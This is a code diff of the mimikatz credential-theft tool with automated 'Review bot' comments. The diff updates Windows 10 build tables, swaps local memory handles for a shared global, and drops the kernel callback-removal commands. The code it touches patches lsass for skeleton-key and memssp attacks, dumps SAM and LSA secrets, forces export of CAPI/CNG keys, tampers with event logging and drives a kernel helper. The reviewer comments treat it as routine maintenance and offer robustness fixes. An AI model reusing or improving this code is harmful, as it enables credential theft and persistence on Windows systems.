pProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]))- EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])
|
||||
NT_SUCCESS(status) && (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext]) != PsInitialSystemProcess;
|
||||
pProcess = (PEPROCESS) ((ULONG_PTR) (*(PVOID *) (((ULONG_PTR) pProcess) + EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])) - EPROCESS_OffSetTable[KiwiOsIndex][EprocessNext])
|
||||
)
|
||||
{
|
||||
status = callback(szBufferIn, bufferIn, outBuffer, pProcess, pvArg);
|
||||
|
@ -39,9 +39,6 @@ NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRe
|
||||
pDeviceObject->Flags &= ~DO_DEVICE_INITIALIZING;
|
||||
IoCreateSymbolicLink(&uStrDosDeviceName, &uStrDriverName);
|
||||
status = AuxKlibInitialize();
|
||||
|
||||
if(KiwiOsIndex >= KiwiOsIndex_VISTA)
|
||||
status = kkll_m_notify_init();
|
||||
}
|
||||
}
|
||||
return status;
|
||||
@ -133,12 +130,6 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
|
||||
case IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST:
|
||||
status = kkll_m_notify_list_object(&kOutputBuffer);
|
||||
break;
|
||||
case IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE:
|
||||
status = kkll_m_notify_remove_process(szBufferIn, bufferIn, &kOutputBuffer);
|
||||
break;
|
||||
case IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE:
|
||||
status = kkll_m_notify_remove_object(szBufferIn, bufferIn, &kOutputBuffer);
|
||||
break;
|
||||
|
||||
case IOCTL_MIMIDRV_FILTER_LIST:
|
||||
status = kkll_m_filters_list(&kOutputBuffer);
|
||||
@ -176,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
|
||||
|
||||
KIWI_OS_INDEX getWindowsIndex()
|
||||
{
|
||||
if(*NtBuildNumber > 9800) // forever blue =)
|
||||
return KiwiOsIndex_10;
|
||||
if(*NtBuildNumber > 10586) // forever 10 =)
|
||||
return KiwiOsIndex_10_1511;
|
||||
|
||||
switch(*NtBuildNumber)
|
||||
{
|
||||
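Review bot: `if(*NtBuildNumber > 10586) return KiwiOsIndex_10_1511;` maps every unknown future build to the 1511 offsets, whereas the switch's `default` returns `KiwiOsIndex_UNK` for unknown builds below it; the two policies disagree, and in a driver a wrong `EPROCESS_OffSetTable` row means `kkll_m_process_enum` follows a bad pointer instead of the request being rejected up front. Failing closed would drop the guard so that builds above 10586 also reach `default: return KiwiOsIndex_UNK;` (with DriverEntry refusing `KiwiOsIndex_UNK`, if it does not already — that check is outside this diff); if the forward compatibility is deliberate, the comment should say so: `// builds newer than 1511 assume the 1511 layout; re-verify offsets on each new build`. The `break;` after each `return` in the next hunk is unreachable and can go. The rest of the function lies outside this hunk.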
@ -204,10 +195,11 @@ KIWI_OS_INDEX getWindowsIndex()
|
||||
case 9600:
|
||||
return KiwiOsIndex_BLUE;
|
||||
break;
|
||||
case 9800:
|
||||
case 9841:
|
||||
case 9926:
|
||||
return KiwiOsIndex_10;
|
||||
case 10240:
|
||||
return KiwiOsIndex_10_1507;
|
||||
break;
|
||||
case 10586:
|
||||
return KiwiOsIndex_10_1511;
|
||||
break;
|
||||
default:
|
||||
return KiwiOsIndex_UNK;
|
||||
|
@ -911,13 +911,12 @@ KULL_M_PATCH_GENERIC Capi4000References[] = {
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleRsaEnh;
|
||||
KULL_M_MEMORY_ADDRESS
|
||||
aPattern4000Memory = {NULL, &hLocalMemory},
|
||||
aPattern4001Memory = {NULL, &hLocalMemory},
|
||||
aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{K_CPExportKey, &hLocalMemory}, 0}, NULL};
|
||||
aPattern4000Memory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE},
|
||||
aPattern4001Memory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE},
|
||||
aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{K_CPExportKey, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, 0}, NULL};
|
||||
PKULL_M_PATCH_GENERIC currentReference4001, currentReference4000;
|
||||
|
||||
currentReference4001 = kull_m_patch_getGenericFromBuild(Capi4001References, ARRAYSIZE(Capi4001References), MIMIKATZ_NT_BUILD_NUMBER);
|
||||
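Review bot: Every `KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL}` local is replaced by the address of one shared global, here and in the later hunks for kuhl_m_lsadump_lsa, kuhl_m_lsadump_trust, kuhl_m_minesweeper_infos, kuhl_m_minesweeper_infos_parseField, kuhl_m_misc_detours_testHookDestination, kuhl_m_misc_generic_nogpo_patch, kuhl_m_misc_addsid, kuhl_m_misc_memssp, kuhl_m_misc_skeleton, kuhl_service_sendcontrol_inprocess, kuhl_m_vault_cred and the kuhl_m_sekurlsa_nt5_* functions. That is equivalent only while nothing writes through the pointer, and it is handed as a presumably non-const `PKULL_M_MEMORY_HANDLE` to calls such as `kull_m_process_getVeryBasicModuleInformationsForName(&KULL_M_MEMORY_GLOBAL_OWN_HANDLE, L"rsaenh.dll", &iModuleRsaEnh)`. The definition of `KULL_M_MEMORY_GLOBAL_OWN_HANDLE` is not in this diff; if it can be declared `const` (with callee parameters `const KULL_M_MEMORY_HANDLE *` where they only read), an accidental write becomes a compile error, otherwise a comment at the definition, `// shared read-only descriptor of the current process; never written through the pointer`, should record the invariant. In kuhl_m_misc_addsid the pointer is also stored into `pOs[i].LocalBackup.hMemory`, where the global is an improvement over the former stack local if that array outlives the call.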
@ -928,7 +927,7 @@ NTSTATUS kuhl_m_crypto_p_capi(int argc, wchar_t * argv[])
|
||||
aPattern4000Memory.address = currentReference4000->Search.Pattern;
|
||||
aPatchMemory.address = currentReference4001->Patch.Pattern;
|
||||
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&hLocalMemory, L"rsaenh.dll", &iModuleRsaEnh))
|
||||
if(kull_m_process_getVeryBasicModuleInformationsForName(&KULL_M_MEMORY_GLOBAL_OWN_HANDLE, L"rsaenh.dll", &iModuleRsaEnh))
|
||||
{
|
||||
sMemory.kull_m_memoryRange.size = iModuleRsaEnh.SizeOfImage - ((PBYTE) K_CPExportKey - (PBYTE) iModuleRsaEnh.DllBase.address);
|
||||
|
||||
@ -964,7 +963,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WNO8_SPCryptExportKey), PTRN_WNO8_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI80_SPCryptExportKey), PTRN_WI80_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
|
||||
};
|
||||
#endif
|
||||
NTSTATUS kuhl_m_crypto_p_cng(int argc, wchar_t * argv[])
|
||||
|
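Review bot: `KULL_M_WIN_BUILD_10_1507` (10240) replaces `KULL_M_WIN_BUILD_10` (9800) in this table and likewise in EventReferences, ScSendControlReferences, CredpCloneCredentialReferences, SamSrvReferences and PTRN_WIN8_LsaInitializeProtectedMemory_KeyRef, yet no `KULL_M_WIN_BUILD_10_1511` row is added anywhere. If `kull_m_patch_getGenericFromBuild` selects the highest entry not above `MIMIKATZ_NT_BUILD_NUMBER` — the helper is not in this diff, so this is inferred — then 1511 silently reuses the 1507 pattern and offsets, and the 9800–10239 preview builds that previously matched now fall back to the BLUE row. A short comment on the new row, `// 10240 and later, including 1511 — re-verify when a build changes the layout`, records that the reuse is intended rather than an omission.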
@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_PerformWriteRequest), PTRN_WNT5_PerformWriteRequest}, {sizeof(PATC_WNT5_PerformWriteRequest), PATC_WNT5_PerformWriteRequest}, {-10}},
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_Channel__ActualProcessEvent), PTRN_WN60_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_Channel__ActualProcessEvent), PTRN_WIN6_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WNT5_PerformWriteRequest[] = {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d};
|
||||
@ -47,7 +47,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_Channel__ActualProcessEvent), PTRN_WN61_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_Channel__ActualProcessEvent), PTRN_WN62_Channel__ActualProcessEvent}, {sizeof(PATC_WIN8_Channel__ActualProcessEvent), PATC_WIN8_Channel__ActualProcessEvent}, {-33}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_Channel__ActualProcessEvent), PTRN_WN63_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-32}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
|
||||
};
|
||||
#endif
|
||||
|
||||
|
@ -21,8 +21,6 @@ const KUHL_K_C kuhl_k_c_kernel[] = {
|
||||
{NULL, IOCTL_MIMIDRV_NOTIFY_IMAGE_LIST, L"notifImage", L"List image notify callbacks"},
|
||||
{NULL, IOCTL_MIMIDRV_NOTIFY_REG_LIST, L"notifReg", L"List registry notify callbacks"},
|
||||
{NULL, IOCTL_MIMIDRV_NOTIFY_OBJECT_LIST, L"notifObject", L"List object notify callbacks"},
|
||||
{kuhl_m_kernel_notifyProcessRemove, IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE,L"notifProcessRemove", L"Remove process notify callback"},
|
||||
{kuhl_m_kernel_notifyObjectRemove, IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE, L"notifObjectRemove", L"Remove object notify callback"},
|
||||
{NULL, IOCTL_MIMIDRV_FILTER_LIST, L"filters", L"List FS filters"},
|
||||
{NULL, IOCTL_MIMIDRV_MINIFILTER_LIST, L"minifilters", L"List minifilters"},
|
||||
{kuhl_m_kernel_sysenv_set, 0, L"sysenvset", L"System Environment Variable Set"},
|
||||
@ -243,7 +241,6 @@ NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
|
||||
NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[])
|
||||
{
|
||||
PCWCHAR szPid;
|
||||
@ -256,33 +253,6 @@ NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_notifyProcessRemove(int argc, wchar_t * argv[])
|
||||
{
|
||||
return kuhl_m_kernel_notifyGenericRemove(argc, argv, IOCTL_MIMIDRV_NOTIFY_PROCESS_REMOVE);
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_notifyObjectRemove(int argc, wchar_t * argv[])
|
||||
{
|
||||
return kuhl_m_kernel_notifyGenericRemove(argc, argv, IOCTL_MIMIDRV_NOTIFY_OBJECT_REMOVE);
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_notifyGenericRemove(int argc, wchar_t * argv[], DWORD code)
|
||||
{
|
||||
PVOID p;
|
||||
if(argc)
|
||||
{
|
||||
#ifdef _M_X64
|
||||
p = (PVOID) _wcstoui64(argv[0], NULL, 0);
|
||||
#else ifdef _M_IX86
|
||||
p = (PVOID) wcstoul(argv[0], NULL, 0);
|
||||
#endif
|
||||
kprintf(L"Target = 0x%p\n", p);
|
||||
kull_m_kernel_mimidrv_simple_output(code, &p, sizeof(PVOID));
|
||||
}
|
||||
else PRINT_ERROR(L"No address?\n");
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[])
|
||||
{
|
||||
NTSTATUS status;
|
||||
|
@ -30,8 +30,5 @@ NTSTATUS kuhl_m_kernel_remove_mimidrv(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_processProtect(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_processToken(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_processPrivilege(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_notifyProcessRemove(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_notifyObjectRemove(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_notifyGenericRemove(int argc, wchar_t * argv[], DWORD code);
|
||||
NTSTATUS kuhl_m_kernel_sysenv_set(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_kernel_sysenv_del(int argc, wchar_t * argv[]);
|
@ -976,7 +976,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-12}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-8}},
|
||||
};
|
||||
#endif
|
||||
PCWCHAR szSamSrv = L"samsrv.dll", szLsaSrv = L"lsasrv.dll", szNtDll = L"ntdll.dll", szKernel32 = L"kernel32.dll", szAdvapi32 = L"advapi32.dll";
|
||||
@ -997,10 +997,9 @@ NTSTATUS kuhl_m_lsadump_lsa(int argc, wchar_t * argv[])
|
||||
PDWORD pRid = NULL, pUse = NULL;
|
||||
|
||||
PKULL_M_MEMORY_HANDLE hMemory = NULL;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModuleSamSrv;
|
||||
HANDLE hSamSs = NULL;
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
PKULL_M_PATCH_GENERIC currentSamSrvReference;
|
||||
|
||||
@ -1397,9 +1396,8 @@ NTSTATUS kuhl_m_lsadump_trust(int argc, wchar_t * argv[])
|
||||
|
||||
PKULL_M_PATCH_GENERIC currentReference;
|
||||
PKULL_M_MEMORY_HANDLE hMemory = NULL;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &hLocalMemory}, aPatchMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aPatternMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatchMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
|
||||
static BOOL isPatching = FALSE;
|
||||
|
@ -32,8 +32,7 @@ NTSTATUS kuhl_m_minesweeper_infos(int argc, wchar_t * argv[])
|
||||
STRUCT_MINESWEEPER_GAME Game;
|
||||
STRUCT_MINESWEEPER_BOARD Board;
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{NULL, NULL}, 0}, NULL};
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {PTRN_WIN6_Game_SafeGetSingleton, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {PTRN_WIN6_Game_SafeGetSingleton, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
BOOL bAlloc = FALSE;
|
||||
LONG offsetTemp = 0;
|
||||
CHAR ** field = NULL;
|
||||
@ -148,8 +147,7 @@ void kuhl_m_minesweeper_infos_parseField(PKULL_M_MEMORY_HANDLE hMemory, PSTRUCT_
|
||||
PSTRUCT_MINESWEEPER_REF_ELEMENT * ref_columns_elements;
|
||||
STRUCT_MINESWEEPER_REF_ELEMENT ref_column_element;
|
||||
DWORD c, r, szFinalElement = isVisible ? sizeof(DWORD) : sizeof(BYTE);
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {base, hMemory}, aLocal = {&ref_first_element, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aRemote = {base, hMemory}, aLocal = {&ref_first_element, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(kull_m_memory_copy(&aLocal, &aRemote, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT)))
|
||||
{
|
||||
|
@ -69,8 +69,7 @@ PBYTE kuhl_m_misc_detours_testHookDestination(PKULL_M_MEMORY_ADDRESS base, WORD
|
||||
{1, bufferJmpOff, sizeof(bufferJmpOff), sizeof(bufferJmpOff), sizeof(LONG), !(machineOfProcess == IMAGE_FILE_MACHINE_I386), TRUE},
|
||||
{0, bufferRetSS, sizeof(bufferRetSS), sizeof(bufferRetSS), sizeof(PVOID), FALSE, FALSE},
|
||||
};
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &hBuffer}, dBuffer = {&dst, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, dBuffer = {&dst, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_ADDRESS pBuffer = *base;
|
||||
DWORD i, sizeToRead;
|
||||
|
||||
@ -193,8 +192,7 @@ BOOL kuhl_m_misc_generic_nogpo_patch(PCWSTR commandLine, PWSTR disableString, SI
|
||||
PEB Peb;
|
||||
PROCESS_INFORMATION processInformation;
|
||||
PIMAGE_NT_HEADERS pNtHeaders;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBaseAdress = {NULL, NULL}, aPattern = {disableString, &hLocalMemory}, aPatch = {enableString, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aBaseAdress = {NULL, NULL}, aPattern = {disableString, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aPatch = {enableString, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
|
||||
if(kull_m_process_create(KULL_M_PROCESS_CREATE_NORMAL, commandLine, CREATE_SUSPENDED, NULL, 0, NULL, NULL, NULL, &processInformation, FALSE))
|
||||
@ -315,8 +313,7 @@ NTSTATUS kuhl_m_misc_addsid(int argc, wchar_t * argv[])
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iNtds;
|
||||
DWORD i, err;
|
||||
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS sAddress = {NULL, &hLocalMemory}, aProcess = {NULL, NULL};
|
||||
KULL_M_MEMORY_ADDRESS sAddress = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aProcess = {NULL, NULL};
|
||||
KULL_M_MEMORY_SEARCH sSearch;
|
||||
BOOL littleSuccess = TRUE;
|
||||
PPOLICY_DNS_DOMAIN_INFO pDnsInfo;
|
||||
@ -367,7 +364,7 @@ NTSTATUS kuhl_m_misc_addsid(int argc, wchar_t * argv[])
|
||||
for(i = 0; (i < pOsSz) && littleSuccess; i++)
|
||||
{
|
||||
littleSuccess = FALSE;
|
||||
pOs[i].LocalBackup.hMemory = &hLocalMemory;
|
||||
pOs[i].LocalBackup.hMemory = &KULL_M_MEMORY_GLOBAL_OWN_HANDLE;
|
||||
pOs[i].LocalBackup.address = NULL;
|
||||
pOs[i].AdressOfPatch.hMemory = aProcess.hMemory;
|
||||
pOs[i].AdressOfPatch.address = NULL;
|
||||
@ -502,8 +499,7 @@ NTSTATUS kuhl_m_misc_memssp(int argc, wchar_t * argv[])
|
||||
{
|
||||
HANDLE hProcess;
|
||||
DWORD processId;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sSearch;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iMSV;
|
||||
PKULL_M_PATCH_GENERIC pGeneric;
|
||||
@ -648,8 +644,7 @@ NTSTATUS kuhl_m_misc_skeleton(int argc, wchar_t * argv[])
|
||||
DWORD processId;
|
||||
HANDLE hProcess;
|
||||
PBYTE localAddr, ptrValue = NULL;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsass, aLocal = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION cryptInfos;
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
LSA_UNICODE_STRING orig;
|
||||
|
@ -14,7 +14,7 @@ BYTE PTRN_WI10_ScSendControl[] = {0x48, 0x8d, 0x6c, 0x24, 0xf9, 0x48, 0x81, 0xe
|
||||
KULL_M_PATCH_GENERIC ScSendControlReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_ScSendControl), PTRN_WN61_ScSendControl}, {0, NULL}, {-26}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_ScSendControl), PTRN_WIN8_ScSendControl}, {0, NULL}, {-21}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {-21}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {-21}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WN61_ScSendControl[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x94, 0x00, 0x00, 0x00, 0x53};
|
||||
@ -24,7 +24,7 @@ BYTE PTRN_WI10_ScSendControl[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xe4, 0xf
|
||||
KULL_M_PATCH_GENERIC ScSendControlReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_ScSendControl), PTRN_WN61_ScSendControl}, {0, NULL}, {0}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_ScSendControl), PTRN_WIN8_ScSendControl}, {0, NULL}, {0}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {0}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_ScSendControl), PTRN_WI10_ScSendControl}, {0, NULL}, {0}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -51,8 +51,7 @@ BOOL kuhl_service_sendcontrol_inprocess(PWSTR ServiceName, DWORD dwControl)
|
||||
PVOID pCode;
|
||||
HANDLE hProcess;
|
||||
KULL_M_MEMORY_ADDRESS aRemoteFunc;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory;
|
||||
PKULL_M_PATCH_GENERIC currentReference;
|
||||
PEB Peb;
|
||||
|
@ -383,7 +383,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA,{sizeof(PTRN_WN60_CredpCloneCredential), PTRN_WN60_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN62_CredpCloneCredential), PTRN_WN62_CredpCloneCredential}, {sizeof(PATC_WALL_CredpCloneCredentialJmpShort), PATC_WALL_CredpCloneCredentialJmpShort}, {7}},
|
